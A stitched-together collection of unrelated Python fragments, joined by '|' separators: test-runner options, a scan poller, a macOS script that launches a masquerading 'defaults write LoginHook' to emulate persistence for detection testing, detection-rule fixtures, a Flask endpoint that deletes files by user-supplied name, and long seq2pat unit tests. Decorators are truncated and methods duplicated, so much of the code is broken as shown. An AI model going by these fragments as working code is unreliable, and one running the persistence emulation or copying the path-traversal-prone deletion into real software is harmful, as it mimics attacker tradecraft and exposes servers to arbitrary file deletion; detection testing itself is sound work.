p.add_options([Option('-l', '--log-level', dest='log_level', default=None, help='Log level for the logger to use during running tests'), Option('-v', action='count', dest='verbosity', default=None, help='Increase verbosity'), Option('--verbosity', action='store', dest='verbosity', type=int, default=None, help='Set numerical level of verbosity (0..4)'), Option('--log-direct', action='store_false', dest='log_lazy', default=True, help='Prevent lazy logging inside tests'), Option('-n', '--no-network', action='store_true', dest='no_network', help='Do not run tests that require the network'), Option('-m', '--memory-db', action='store_true', dest='memory_db', help='Run database tests using memory instead of file'), Option('-f', '--fast', action='store_true', dest='fast', help='Try to increase speed of the tests, decreasing of wait intervals, memory database'), Option('-i', '--ignore', action='store_true', dest='negate_re', help='negate [regexps] filter to ignore tests matched specified regexps'), Option('-t', '--log-traceback', action='store_true', help='Enrich log-messages with compressed tracebacks'), Option('--full-traceback', action='store_true', help='Either to make the tracebacks full, not compressed (as by default)')])
return p |
def scan_status(task_id):
status_url = (((base_url + '/scan/') + task_id) + '/status')
while True:
status_url_resp = req.api_request(status_url, 'GET', api_header)
if (json.loads(status_url_resp.text)['status'] == 'terminated'):
result = show_scan_data(task_id)
return result
else:
time.sleep(10) |
_os(*metadata.platforms)
def main():
masquerade = '/tmp/defaults'
common.create_macos_masquerade(masquerade)
common.log('Launching fake defaults command to mimic installing a login hook.')
common.execute([masquerade, 'write', 'LoginHook'], timeout=10, kill=True)
common.remove_file(masquerade) |
class OptionPlotoptionsSankeyTooltipDatetimelabelformats(Options):
def day(self):
return self._config_get('%A, %e %b %Y')
def day(self, text: str):
self._config(text, js_type=False)
def hour(self):
return self._config_get('%A, %e %b, %H:%M')
def hour(self, text: str):
self._config(text, js_type=False)
def millisecond(self):
return self._config_get('%A, %e %b, %H:%M:%S.%L')
def millisecond(self, text: str):
self._config(text, js_type=False)
def minute(self):
return self._config_get('%A, %e %b, %H:%M')
def minute(self, text: str):
self._config(text, js_type=False)
def month(self):
return self._config_get('%B %Y')
def month(self, text: str):
self._config(text, js_type=False)
def second(self):
return self._config_get('%A, %e %b, %H:%M:%S')
def second(self, text: str):
self._config(text, js_type=False)
def week(self):
return self._config_get('Week from %A, %e %b %Y')
def week(self, text: str):
self._config(text, js_type=False)
def year(self):
return self._config_get('%Y')
def year(self, text: str):
self._config(text, js_type=False) |
class TestVersionLockSchema(unittest.TestCase):
def setUpClass(cls):
cls.version_lock_contents = {'33f306e8-417c-411b-965c-c2812d6d3f4d': {'rule_name': 'Remote File Download via PowerShell', 'sha256': '8679cd72bf85b67dde3dcfdaba749ed1fa6560bca5efd03ed41c76a500ce31d6', 'type': 'eql', 'version': 4}, '34fde489-94b0-4500-a76f-b8a157cf9269': {'min_stack_version': '8.2', 'previous': {'7.13': {'rule_name': 'Telnet Port Activity', 'sha256': '3dd4a438c915920e6ddb0a5212603af5d94fb8a6b51a32f223d930d7e3becb89', 'type': 'query', 'version': 9}}, 'rule_name': 'Telnet Port Activity', 'sha256': 'b0bdfafb83eadc0303ad1801e0707743f96a36209aa58228d3bf6a89', 'type': 'query', 'version': 10}}
def test_version_lock_no_previous(self):
version_lock_contents = copy.deepcopy(self.version_lock_contents)
VersionLockFile.from_dict(dict(data=version_lock_contents))
def test_version_lock_has_nested_previous(self):
version_lock_contents = copy.deepcopy(self.version_lock_contents)
with self.assertRaises(ValidationError):
previous = version_lock_contents['34fde489-94b0-4500-a76f-b8a157cf9269']['previous']
version_lock_contents['34fde489-94b0-4500-a76f-b8a157cf9269']['previous']['previous'] = previous
VersionLockFile.from_dict(dict(data=version_lock_contents)) |
def extractLittleducktlWordpressCom(item):
(vol, chp, frag, postfix) = extractVolChapterFragmentPostfix(item['title'])
if ((not (chp or vol)) or ('preview' in item['title'].lower())):
return None
tagmap = [('PRC', 'PRC', 'translated'), ('Loiterous', 'Loiterous', 'oel')]
for (tagname, name, tl_type) in tagmap:
if (tagname in item['tags']):
return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
return False |
_page.route('/table/delete_config', methods=['POST'])
def table_delete_config():
res = check_uuid(all_data['uuid'], request.json['uuid'])
if (res != None):
return jsonify(res)
if ('config_name' in request.json):
if (request.json['config_name'] != all_data['log_config_name']):
log_dir = all_data['root_log_dir']
path = os.path.join(log_dir, request.json['config_name'])
if os.path.isfile(path):
try:
os.remove(path)
except Exception as e:
print('Error occurs when delete config:{}.'.format(request.json['config_name']))
traceback.print_exc()
return jsonify(status='fail', msg='Error happens when delete.')
return jsonify(status='success')
else:
jsonify(status='success')
else:
return jsonify(status='fail', msg='Cannot delete config being used.')
else:
return jsonify(status='fail', msg='There is no config_name in your request.') |
class BuildTimedelta(PropertyPreprocessor):
type = 'to_timedelta'
properties_schema_cls = BuildTimedeltaSchema
def imports(self):
return {'modules': ['datetime']}
def process_arg(self, arg, node, raw_args):
delta = None
if (arg is None):
return delta
try:
timedelta_arg = {self.properties['units']: arg}
delta = datetime.timedelta(**timedelta_arg)
except TypeError as e:
raise Exception('Error in preprocessor {} for argument `{}`: {}'.format(self.type, arg, str(e)))
return delta |
class CoprFormFactory(object):
def create_form_cls(user=None, group=None, copr=None):
class F(CoprForm):
id = wtforms.HiddenField()
group_id = wtforms.HiddenField()
name = wtforms.StringField('Name', validators=[wtforms.validators.DataRequired(), NameCharactersValidator(), CoprUniqueNameValidator(user=user, group=group), NameNotNumberValidator()])
persistent = wtforms.BooleanField('Protect project and its builds against deletion', description="Project's builds and the project itself\n cannot be deleted by any means. This option is set once and\n for all (this option can not be changed after project is\n created).", render_kw={'disabled': bool(copr)}, default=False, false_values=FALSE_VALUES)
delete_after_days = wtforms.IntegerField('Delete after days', validators=[wtforms.validators.Optional(), wtforms.validators.NumberRange(min=0, max=60)], render_kw={'disabled': bool((copr and copr.persistent))})
chroots = ChrootsField(copr=copr)
def selected_chroots(self):
return self.chroots.data
def validate(self, extra_validators=None):
if (not super(F, self).validate(extra_validators=extra_validators)):
return False
if (not self.validate_mock_chroots_not_empty()):
self.form_errors = ['At least one chroot must be selected']
return False
if (self.persistent.data and self.delete_after_days.data):
self.delete_after_days.errors.append("'delete after' can not be combined with persistent")
return False
return True
def validate_mock_chroots_not_empty(self):
return bool(self.chroots.data)
return F |
class TestSeq2Pat(unittest.TestCase):
TEST_DIR = os.path.dirname(os.path.abspath(__file__))
DATA_DIR = (((TEST_DIR + os.sep) + 'data') + os.sep)
def test_example(self):
seq2pat = Seq2Pat(sequences=[['A', 'C', 'B', 'A', 'D'], ['C', 'B', 'A'], ['C', 'A', 'C', 'D']])
patterns = seq2pat.get_patterns(min_frequency=2)
price = Attribute(values=[[5, 5, 3, 8, 2], [1, 3, 3], [4, 5, 2, 1]])
timestamp = Attribute(values=[[1, 1, 2, 3, 3], [3, 8, 9], [2, 5, 5, 7]])
avg_constraint = (3 <= price.average() <= 5)
seq2pat.add_constraint(avg_constraint)
patterns = seq2pat.get_patterns(min_frequency=2)
self.assertListEqual([['A', 'C', 2], ['A', 'D', 2], ['C', 'A', 'D', 2]], patterns)
seq2pat.remove_constraint(avg_constraint)
patterns = seq2pat.get_patterns(min_frequency=2)
self.assertListEqual([['C', 'A', 3], ['A', 'C', 2], ['A', 'C', 'D', 2], ['A', 'D', 2], ['B', 'A', 2], ['C', 'A', 'D', 2], ['C', 'B', 2], ['C', 'B', 'A', 2], ['C', 'D', 2]], patterns)
def test_usage_example_average(self):
seq2pat = Seq2Pat(sequences=[['A', 'A', 'B', 'A', 'D'], ['C', 'B', 'A'], ['C', 'A', 'C', 'D']])
price = Attribute(values=[[5, 5, 3, 8, 2], [1, 3, 3], [4, 5, 2, 1]])
timestamp = Attribute(values=[[1, 1, 2, 3, 3], [3, 8, 9], [2, 5, 5, 7]])
avg_constraint = seq2pat.add_constraint((3 <= price.average() <= 4))
patterns = seq2pat.get_patterns(min_frequency=2)
self.assertListEqual([['A', 'D', 2]], patterns)
def test_usage_example_gap(self):
seq2pat = Seq2Pat(sequences=[['A', 'A', 'B', 'A', 'D'], ['C', 'B', 'A'], ['C', 'A', 'C', 'D']])
price = Attribute(values=[[5, 5, 3, 2, 8], [1, 3, 3], [4, 1, 2, 5]])
timestamp = Attribute(values=[[1, 1, 2, 3, 3], [3, 8, 9], [2, 5, 5, 7]])
gap_constraint = seq2pat.add_constraint((4 <= price.gap() <= 6))
patterns = seq2pat.get_patterns(min_frequency=2)
self.assertListEqual([['A', 'D', 2]], patterns)
def test_usage_example_span(self):
seq2pat = Seq2Pat(sequences=[['A', 'A', 'B', 'A', 'D'], ['C', 'B', 'A'], ['C', 'A', 'C', 'D']])
price = Attribute(values=[[5, 5, 3, 8, 2], [1, 3, 3], [4, 5, 2, 1]])
timestamp = Attribute(values=[[1, 1, 2, 3, 3], [3, 8, 9], [2, 5, 5, 7]])
span_constraint = seq2pat.add_constraint((0 <= timestamp.span() <= 2))
patterns = seq2pat.get_patterns(min_frequency=2)
self.assertListEqual([['A', 'D', 2], ['B', 'A', 2]], sorted(patterns))
def test_usage_example_median(self):
seq2pat = Seq2Pat(sequences=[['A', 'A', 'B', 'A', 'D'], ['C', 'B', 'A'], ['C', 'A', 'C', 'D']])
price = Attribute(values=[[5, 5, 3, 8, 2], [1, 3, 3], [4, 5, 2, 1]])
timestamp = Attribute(values=[[1, 1, 2, 3, 3], [3, 8, 9], [2, 5, 5, 7]])
med_constraint = seq2pat.add_constraint((3 <= price.median() <= 4))
patterns = seq2pat.get_patterns(min_frequency=2)
self.assertListEqual([['A', 'D', 2]], patterns)
def test_quick_start_int(self):
seq2pat = Seq2Pat(sequences=[[1, 1, 2, 1, 4], [3, 2, 1], [3, 1, 3, 4]])
price = Attribute(values=[[5, 5, 3, 8, 2], [1, 3, 3], [4, 5, 2, 1]])
seq2pat.add_constraint(((- 6) <= price.gap()))
patterns = seq2pat.get_patterns(min_frequency=2)
self.assertListEqual([[1, 4, 2], [2, 1, 2], [3, 1, 2]], patterns)
def test_quick_start(self):
seq2pat = Seq2Pat(sequences=[['A', 'A', 'B', 'A', 'D'], ['C', 'B', 'A'], ['C', 'A', 'C', 'D']])
price = Attribute(values=[[5, 5, 3, 8, 2], [1, 3, 3], [4, 5, 2, 1]])
seq2pat.add_constraint(((- 6) <= price.gap() <= (- 1)))
patterns = seq2pat.get_patterns(min_frequency=2)
self.assertListEqual([['A', 'D', 2]], patterns)
def test_usage_lb_ub(self):
sequences = [[1, 2, 3], [4, 5], [1, 3, 6, 7]]
seq2pat = Seq2Pat(sequences)
attributes = [[10, 20, 30], [40, 50], [10, 30, 60, 70]]
att1 = Attribute(attributes)
att2 = Attribute(attributes)
gap_constraint = (0 <= att1.gap() <= 10)
seq2pat.add_constraint(gap_constraint)
avg_constraint = seq2pat.add_constraint((20 <= att1.average() <= 30))
median_constraint = seq2pat.add_constraint(((- 1) <= att1.median() <= 1000))
span_constraint = seq2pat.add_constraint((0 <= att1.span() <= 900))
span_constraint2 = seq2pat.add_constraint(((- 10) <= att2.span() <= 5))
self.assertEqual(gap_constraint.lower_bound, 0)
self.assertEqual(avg_constraint.lower_bound, 20)
self.assertEqual(median_constraint.lower_bound, (- 1))
self.assertEqual(span_constraint.lower_bound, 0)
self.assertEqual(span_constraint2.lower_bound, (- 10))
self.assertEqual(gap_constraint.upper_bound, 10)
self.assertEqual(avg_constraint.upper_bound, 30)
self.assertEqual(median_constraint.upper_bound, 1000)
self.assertEqual(span_constraint.upper_bound, 900)
self.assertEqual(span_constraint2.upper_bound, 5)
seq2pat.remove_constraint(gap_constraint)
seq2pat.remove_constraint(avg_constraint)
seq2pat.remove_constraint(median_constraint)
seq2pat.remove_constraint(span_constraint)
seq2pat.add_constraint(gap_constraint)
seq2pat.add_constraint(span_constraint)
def test_usage_lb(self):
sequences = [[1, 2, 3], [4, 5], [1, 3, 6, 7]]
seq2pat = Seq2Pat(sequences)
attributes = [[10, 20, 30], [40, 50], [10, 30, 60, 70]]
att1 = Attribute(attributes)
att2 = Attribute(attributes)
gap_constraint = (0 <= att1.gap())
seq2pat.add_constraint(gap_constraint)
avg_constraint = seq2pat.add_constraint((20 <= att1.average()))
median_constraint = seq2pat.add_constraint(((- 1) <= att1.median()))
span_constraint = seq2pat.add_constraint((0 <= att1.span()))
span_constraint2 = seq2pat.add_constraint(((- 10) <= att2.span()))
self.assertEqual(gap_constraint.lower_bound, 0)
self.assertEqual(avg_constraint.lower_bound, 20)
self.assertEqual(median_constraint.lower_bound, (- 1))
self.assertEqual(span_constraint.lower_bound, 0)
self.assertEqual(span_constraint2.lower_bound, (- 10))
seq2pat.remove_constraint(gap_constraint)
seq2pat.remove_constraint(avg_constraint)
seq2pat.remove_constraint(median_constraint)
seq2pat.remove_constraint(span_constraint)
seq2pat.add_constraint(gap_constraint)
seq2pat.add_constraint(span_constraint)
def test_usage(self):
patterns_file = (self.DATA_DIR + 'input.txt')
sequences = read_data(patterns_file)
attribute_file = (self.DATA_DIR + 'input_att1.txt')
attribute_1 = read_data(attribute_file)
seq2pat = Seq2Pat(sequences, max_span=None)
att1 = Attribute(attribute_1)
avg_constraint = seq2pat.add_constraint((5 <= att1.average()))
gap_constraint = seq2pat.add_constraint((att1.gap() <= 10))
median_constraint = seq2pat.add_constraint((10 <= att1.median() <= 15))
span_constraint = seq2pat.add_constraint((att1.span() <= 20))
seq2pat.get_patterns(min_frequency=100)
def test_from_mpp(self):
seq2pat = Seq2Pat(sequences=[['A', 'A', 'B', 'A', 'D'], ['C', 'B', 'A'], ['C', 'A', 'C', 'D']])
time = Attribute(values=[[1, 1, 2, 3, 3], [3, 8, 9], [2, 5, 5, 7]])
price = Attribute(values=[[5, 5, 3, 8, 2], [1, 3, 3], [4, 5, 2, 1]])
patterns = seq2pat.get_patterns(min_frequency=3)
self.assertListEqual([], patterns)
def test_bounds_with_minus_1(self):
seq2pat = Seq2Pat(sequences=[['A', 'A', 'B', 'A', 'D'], ['C', 'B', 'A'], ['C', 'A', 'C', 'D']])
price = Attribute(values=[[5, 5, 3, 8, 2], [1, 3, 3], [4, 5, 2, 1]])
timestamp = Attribute(values=[[1, 1, 2, 3, 3], [3, 8, 9], [2, 5, 5, 7]])
gap_constraint = seq2pat.add_constraint(((- 6) <= price.gap() <= (- 1)))
patterns = seq2pat.get_patterns(min_frequency=2)
self.assertListEqual([['A', 'D', 2]], patterns)
def test_min_frequency_as_1_integer(self):
seq2pat = Seq2Pat(sequences=[['A', 'A', 'B', 'A', 'D'], ['C', 'B', 'A'], ['C', 'A', 'C', 'D']])
price = Attribute(values=[[5, 5, 3, 8, 2], [1, 3, 3], [4, 5, 2, 1]])
timestamp = Attribute(values=[[1, 1, 2, 3, 3], [3, 8, 9], [2, 5, 5, 7]])
patterns = seq2pat.get_patterns(min_frequency=1)
results = [['A', 'D', 2], ['B', 'A', 2], ['C', 'A', 2], ['A', 'A', 1], ['A', 'A', 'A', 1], ['A', 'A', 'A', 'D', 1], ['A', 'A', 'B', 1], ['A', 'A', 'B', 'A', 1], ['A', 'A', 'B', 'A', 'D', 1], ['A', 'A', 'B', 'D', 1], ['A', 'A', 'D', 1], ['A', 'B', 1], ['A', 'B', 'A', 1], ['A', 'B', 'A', 'D', 1], ['A', 'B', 'D', 1], ['A', 'C', 1], ['A', 'C', 'D', 1], ['B', 'A', 'D', 1], ['B', 'D', 1], ['C', 'A', 'C', 1], ['C', 'A', 'C', 'D', 1], ['C', 'A', 'D', 1], ['C', 'B', 1], ['C', 'B', 'A', 1], ['C', 'C', 1], ['C', 'C', 'D', 1], ['C', 'D', 1]]
self.assertListEqual(patterns, results)
def test_min_frequency_as_1dot0_float(self):
seq2pat = Seq2Pat(sequences=[['A', 'A', 'B', 'A', 'D'], ['C', 'B', 'A'], ['C', 'A', 'C', 'D']])
price = Attribute(values=[[5, 5, 3, 8, 2], [1, 3, 3], [4, 5, 2, 1]])
timestamp = Attribute(values=[[1, 1, 2, 3, 3], [3, 8, 9], [2, 5, 5, 7]])
patterns = seq2pat.get_patterns(min_frequency=1.0)
self.assertListEqual([], patterns)
def test_string(self):
seq2pat = Seq2Pat(sequences=[['A', 'C', 'B', 'C'], ['D', 'A', 'E', 'B', 'W', 'C'], ['W', 'W', 'C', 'A', 'A', 'B', 'S', 'C'], ['D', 'A', 'C', 'B', 'A', 'C']])
patterns = seq2pat.get_patterns(min_frequency=4)
self.assertEqual(4, len(patterns))
self.assertTrue((['B', 'C', 4] in patterns))
self.assertTrue((['A', 'C', 4] in patterns))
self.assertTrue((['A', 'B', 4] in patterns))
self.assertTrue((['A', 'B', 'C', 4] in patterns))
self.assertListEqual([['A', 'B', 4], ['A', 'B', 'C', 4], ['A', 'C', 4], ['B', 'C', 4]], patterns)
def test_string_from_int(self):
seq2pat = Seq2Pat(sequences=[[1, 3, 2, 3], [4, 1, 5, 2, 10, 3], [10, 10, 3, 1, 1, 2, 9, 3], [4, 1, 3, 2, 1, 3]])
patterns = seq2pat.get_patterns(min_frequency=4)
self.assertListEqual([[1, 2, 4], [1, 2, 3, 4], [1, 3, 4], [2, 3, 4]], patterns)
def test_operator(self):
attributes = [[10, 20, 30], [40, 50], [10, 30, 60, 70]]
attribute_1 = Attribute(attributes)
c1 = (100 <= attribute_1.average() <= 500)
c2 = (200 <= attribute_1.span())
c3 = (attribute_1.span() <= 1456)
self.assertEqual(c1.lower_bound, 100)
self.assertEqual(c2.lower_bound, 200)
self.assertEqual(c3.lower_bound, None)
self.assertEqual(c1.upper_bound, 500)
self.assertEqual(c2.upper_bound, None)
self.assertEqual(c3.upper_bound, 1456)
def test_input(self):
patterns_file = (self.DATA_DIR + 'input.txt')
sequences = read_data(patterns_file)
self.assertTrue((type(sequences) == list))
self.assertTrue((len(sequences) == 52619))
self.assertTrue((len(sequences[0]) == 5))
attribute_file = (self.DATA_DIR + 'input_att1.txt')
attribute_1 = read_data(attribute_file)
self.assertTrue((type(attribute_1) == list))
self.assertTrue((len(attribute_1) == 52619))
self.assertTrue((len(attribute_1[0]) == 5))
def test_input_item_variables(self):
patterns_file = (self.DATA_DIR + 'input.txt')
sequences = read_data(patterns_file)
m = get_max_column_size(sequences)
n = len(sequences)
l = get_max_value(sequences)
self.assertEqual(161, m)
self.assertEqual(52619, n)
self.assertEqual(3340, l)
def test_invalid_freq(self):
sequences = [[1, 2, 3], [4, 5], [1, 3, 6, 7]]
seq2pat = Seq2Pat(sequences)
with self.assertRaises(ValueError):
seq2pat.get_patterns((- 1))
with self.assertRaises(ValueError):
seq2pat.get_patterns(0)
def test_invalid_patterns(self):
sequences = None
with self.assertRaises(ValueError):
seq2pat = Seq2Pat(sequences)
sequences = [[1, 2, 3], 'string', [1, 3, 6, 7]]
with self.assertRaises(ValueError):
seq2pat = Seq2Pat(sequences)
sequences = [[1, 2, 3], [1, 3, 6, 7], 1]
with self.assertRaises(ValueError):
seq2pat = Seq2Pat(sequences)
patterns = [set(), [1, 2, 3], [1, 3, 6, 7]]
def test_invalid_patterns(self):
sequences = None
with self.assertRaises(ValueError):
seq2pat = Seq2Pat(sequences)
sequences = [[1, 2, 3], 'string', [1, 3, 6, 7]]
with self.assertRaises(ValueError):
seq2pat = Seq2Pat(sequences)
sequences = [[1, 2, 3], [1, 3, 6, 7], 1]
with self.assertRaises(ValueError):
seq2pat = Seq2Pat(sequences)
patterns = [set(), [1, 2, 3], [1, 3, 6, 7]]
with self.assertRaises(ValueError):
patterns = [set(), 'string', 1]
seq2pat = Seq2Pat(sequences)
def test_invalid_attributes(self):
with self.assertRaises(ValueError):
Attribute(None)
attribute = [[1, 2, 3], 'string', [1, 3, 6, 7]]
with self.assertRaises(ValueError):
Attribute(attribute)
attribute = [[1, 2, 3], [1, 3, 6, 7], 1]
with self.assertRaises(ValueError):
Attribute(attribute)
attribute = [set(), [1, 2, 3], [1, 3, 6, 7]]
with self.assertRaises(ValueError):
Attribute(attribute)
attribute = [set(), 'string', 1]
with self.assertRaises(ValueError):
Attribute(attribute)
def test_setter(self):
python_seq2pat = stp.PySeq2pat()
patterns_file = (self.DATA_DIR + 'input.txt')
sequences = read_data(patterns_file)
seq2pat = Seq2Pat(sequences)
python_seq2pat.lgap = [30]
python_seq2pat.ugap = [900]
python_seq2pat.lspn = [77]
python_seq2pat.uspn = [9, 80]
python_seq2pat.lavr = [9, 88]
python_seq2pat.uavr = [7]
python_seq2pat.lmed = [9, 9, 8]
python_seq2pat.umed = [99999]
self.assertListEqual(python_seq2pat.lgap, [30])
self.assertListEqual(python_seq2pat.ugap, [900])
self.assertListEqual(python_seq2pat.lspn, [77])
self.assertListEqual(python_seq2pat.uspn, [9, 80])
self.assertListEqual(python_seq2pat.lavr, [9, 88])
self.assertListEqual(python_seq2pat.uavr, [7])
self.assertListEqual(python_seq2pat.lmed, [9, 9, 8])
self.assertListEqual(python_seq2pat.umed, [99999])
python_seq2pat.lgapi = [0]
python_seq2pat.ugapi = [0]
python_seq2pat.lspni = [1]
python_seq2pat.uspni = [1, 0]
python_seq2pat.lavri = [0, 1]
python_seq2pat.uavri = [0]
python_seq2pat.lmedi = [0, 1, 2]
python_seq2pat.umedi = [2]
self.assertListEqual(python_seq2pat.lgapi, [0])
self.assertListEqual(python_seq2pat.ugapi, [0])
self.assertListEqual(python_seq2pat.lspni, [1])
self.assertListEqual(python_seq2pat.uspni, [1, 0])
self.assertListEqual(python_seq2pat.lavri, [0, 1])
self.assertListEqual(python_seq2pat.uavri, [0])
self.assertListEqual(python_seq2pat.lmedi, [0, 1, 2])
self.assertListEqual(python_seq2pat.umedi, [2])
python_seq2pat.num_minmax = [0, 0, 0]
python_seq2pat.num_avr = [1, 1, 1]
python_seq2pat.num_med = [0, 1, 2]
python_seq2pat.tot_gap = [0, 1, 0]
python_seq2pat.tot_spn = [2, 2, 2]
python_seq2pat.tot_avr = [0, 1, 1]
self.assertListEqual(python_seq2pat.num_minmax, [0, 0, 0])
self.assertListEqual(python_seq2pat.num_avr, [1, 1, 1])
self.assertListEqual(python_seq2pat.num_med, [0, 1, 2])
self.assertListEqual(python_seq2pat.tot_gap, [0, 1, 0])
self.assertListEqual(python_seq2pat.tot_spn, [2, 2, 2])
self.assertListEqual(python_seq2pat.tot_avr, [0, 1, 1])
python_seq2pat.num_att = 3
python_seq2pat.N = 200
python_seq2pat.M = 999
python_seq2pat.L = 89
python_seq2pat.theta = 89
self.assertEqual(python_seq2pat.num_att, 3)
self.assertEqual(python_seq2pat.N, 200)
self.assertEqual(python_seq2pat.M, 999)
self.assertEqual(python_seq2pat.L, 89)
self.assertEqual(python_seq2pat.theta, 89)
def test_seq2patfinder_default(self):
patterns_file = (self.DATA_DIR + 'input.txt')
sequences = read_data(patterns_file)
seq2pat = Seq2Pat(sequences, max_span=None)
attribute_file = (self.DATA_DIR + 'input_att1.txt')
attr1_data = read_data(attribute_file)
att1 = Attribute(attr1_data)
attribute_file = (self.DATA_DIR + 'input_att2.txt')
attr2_data = read_data(attribute_file)
att2 = Attribute(attr2_data)
cts1 = seq2pat.add_constraint((30 <= att1.gap() <= 900))
cts2 = seq2pat.add_constraint((900 <= att1.span()))
cts3 = seq2pat.add_constraint((30 <= att2.average() <= 70))
cts4 = seq2pat.add_constraint((40 <= att2.median() <= 60))
test_pf = seq2pat._get_cython_imp((- 1))
self.assertListEqual([30], test_pf.lgap)
self.assertListEqual([900], test_pf.ugap)
self.assertListEqual([30], test_pf.lavr)
self.assertListEqual([70], test_pf.uavr)
self.assertListEqual([900], test_pf.lspn)
self.assertListEqual([], test_pf.uspn)
self.assertListEqual([40], test_pf.lmed)
self.assertListEqual([0], test_pf.ugapi)
self.assertListEqual([0], test_pf.lgapi)
self.assertListEqual([], test_pf.uspni)
self.assertListEqual([0], test_pf.lspni)
self.assertListEqual([1], test_pf.uavri)
self.assertListEqual([1], test_pf.lavri)
self.assertListEqual([1], test_pf.umedi)
self.assertListEqual([1], test_pf.lmedi)
self.assertListEqual([2, 0], test_pf.num_minmax)
self.assertListEqual([0, 2], test_pf.num_avr)
self.assertListEqual([0, 2], test_pf.num_med)
self.assertListEqual([0], test_pf.tot_gap)
self.assertListEqual([0], test_pf.tot_spn)
self.assertListEqual([1], test_pf.tot_avr)
self.assertEqual(161, test_pf.M)
self.assertEqual(52619, test_pf.N)
self.assertEqual(3340, test_pf.L)
self.assertListEqual([284871, 100], test_pf.max_attrs)
self.assertListEqual([0, 1], test_pf.min_attrs)
test_patterns = seq2pat.get_patterns(0.001)
dup_patterns = seq2pat.get_patterns(0.001)
self.assertListEqual(test_patterns, dup_patterns)
results_file = (self.DATA_DIR + 'default_results.txt')
control_patterns = read_data(results_file)
sorted_control = sort_pattern(control_patterns)
self.assertListEqual(sorted_control, test_patterns)
cts5 = seq2pat.remove_constraint((40 <= att2.median() <= 60))
ct6 = seq2pat.remove_constraint((30 <= att2.average() <= 70))
test_pf = seq2pat._get_cython_imp((- 1))
self.assertListEqual([], test_pf.umedi)
self.assertListEqual([], test_pf.lmedi)
self.assertListEqual([], test_pf.uavr)
self.assertListEqual([], test_pf.uavri)
self.assertListEqual([0], test_pf.num_med)
one_constraint_result = seq2pat.get_patterns(0.001)
results_file = (self.DATA_DIR + 'one_constraint_results.txt')
control_patterns = read_data(results_file)
sorted_controls = sort_pattern(control_patterns)
self.assertListEqual(sorted_controls, one_constraint_result)
def test_input_one_attribute_constraint(self):
patterns_file = (self.DATA_DIR + 'input.txt')
sequences = read_data(patterns_file)
seq2pat = Seq2Pat(sequences, max_span=None)
attribute_file = (self.DATA_DIR + 'input_att1.txt')
attr1_data = read_data(attribute_file)
att1 = Attribute(attr1_data)
cts1 = seq2pat.add_constraint((30 <= att1.gap() <= 900))
cts2 = seq2pat.add_constraint((900 <= att1.span()))
test_patterns = seq2pat.get_patterns(0.001)
results_file = (self.DATA_DIR + 'one_constraint_results.txt')
control_patterns = read_data(results_file)
sorted_controls = sort_pattern(control_patterns)
self.assertListEqual(sorted_controls, test_patterns)
self.assertFalse((test_patterns == read_data((self.DATA_DIR + 'default_results.txt'))))
def test_input_no_constraint(self):
patterns_file = (self.DATA_DIR + 'input.txt')
sequences = read_data(patterns_file)
seq2pat = Seq2Pat(sequences, max_span=None)
test_patterns = seq2pat.get_patterns(0.01)
results_file = (self.DATA_DIR + 'no_constraints_results.txt')
control_patterns = read_data(results_file)
sorted_results = sort_pattern(control_patterns)
self.assertListEqual(sorted_results, test_patterns)
self.assertFalse((test_patterns == read_data((self.DATA_DIR + 'default_results.txt'))))
def test_input_diff_constraint(self):
patterns_file = (self.DATA_DIR + 'input.txt')
sequences = read_data(patterns_file)
seq2pat = Seq2Pat(sequences, max_span=None)
attribute_file = (self.DATA_DIR + 'input_att1.txt')
attr1_data = read_data(attribute_file)
att1 = Attribute(attr1_data)
attribute_file = (self.DATA_DIR + 'input_att2.txt')
attr2_data = read_data(attribute_file)
att2 = Attribute(attr2_data)
cts1 = seq2pat.add_constraint((20 <= att1.gap() <= 1000))
cts2 = seq2pat.add_constraint((800 <= att1.span() <= 3700))
cts3 = seq2pat.add_constraint((20 <= att2.average() <= 80))
cts4 = seq2pat.add_constraint((30 <= att2.median() <= 70))
test_patterns = seq2pat.get_patterns(0.001)
results_file = (self.DATA_DIR + 'diff_constraints_results.txt')
control_patterns = read_data(results_file)
sorted_control = sort_pattern(control_patterns)
self.assertListEqual(sorted_control, test_patterns)
def test_input_no_lower_constraint(self):
patterns_file = (self.DATA_DIR + 'input.txt')
sequences = read_data(patterns_file)
seq2pat = Seq2Pat(sequences, max_span=None)
attribute_file = (self.DATA_DIR + 'input_att1.txt')
attr1_data = read_data(attribute_file)
att1 = Attribute(attr1_data)
attribute_file = (self.DATA_DIR + 'input_att2.txt')
attr2_data = read_data(attribute_file)
att2 = Attribute(attr2_data)
cts1 = seq2pat.add_constraint((att1.gap() <= 900))
cts2 = seq2pat.add_constraint((att1.span() <= 3600))
cts3 = seq2pat.add_constraint((att2.average() <= 70))
cts4 = seq2pat.add_constraint((att2.median() <= 60))
test_patterns = seq2pat.get_patterns(0.001)
results_file = (self.DATA_DIR + 'no_lower_constraint_results.txt')
control_patterns = read_data(results_file)
sorted_control = sort_pattern(control_patterns)
self.assertListEqual(sorted_control, test_patterns)
def test_input_no_upper_constraint(self):
patterns_file = (self.DATA_DIR + 'input.txt')
sequences = read_data(patterns_file)
seq2pat = Seq2Pat(sequences, max_span=None)
attribute_file = (self.DATA_DIR + 'input_att1.txt')
attr1_data = read_data(attribute_file)
att1 = Attribute(attr1_data)
attribute_file = (self.DATA_DIR + 'input_att2.txt')
attr2_data = read_data(attribute_file)
att2 = Attribute(attr2_data)
cts1 = seq2pat.add_constraint((30 <= att1.gap()))
cts2 = seq2pat.add_constraint((900 <= att1.span()))
cts3 = seq2pat.add_constraint((30 <= att2.average()))
cts4 = seq2pat.add_constraint((40 <= att2.median()))
test_patterns = seq2pat.get_patterns(0.01)
results_file = (self.DATA_DIR + 'no_upper_constraint_results.txt')
control_patterns = read_data(results_file)
sorted_control = sort_pattern(control_patterns)
self.assertListEqual(sorted_control, test_patterns)
def test_compare_results(self):
a = [1, 2]
b = [4, 5]
c = [6, 7, 8]
list_a = [a, b, c]
list_b = [c]
(a_b, b_a) = compare_results(list_a, list_b)
self.assertListEqual([a, b], a_b)
self.assertEqual([], b_a)
def test_attribute_mapping(self):
sequences = [[1, 2, 3], [4, 5], [1, 3, 6, 7]]
seq2pat = Seq2Pat(sequences)
attribute = [[1, 2, 3, 5], [4, 5], [1, 3, 6, 7]]
att1 = Attribute(attribute)
with self.assertRaises(ValueError):
seq2pat.add_constraint((0 <= att1.gap() <= 10))
attribute = [[1, 2, 3, 5], [4], [1, 3, 6, 7]]
att1 = Attribute(attribute)
with self.assertRaises(ValueError):
seq2pat.add_constraint((0 <= att1.gap() <= 10))
def test_gap_inequality(self):
sequences = [[11, 12, 13]]
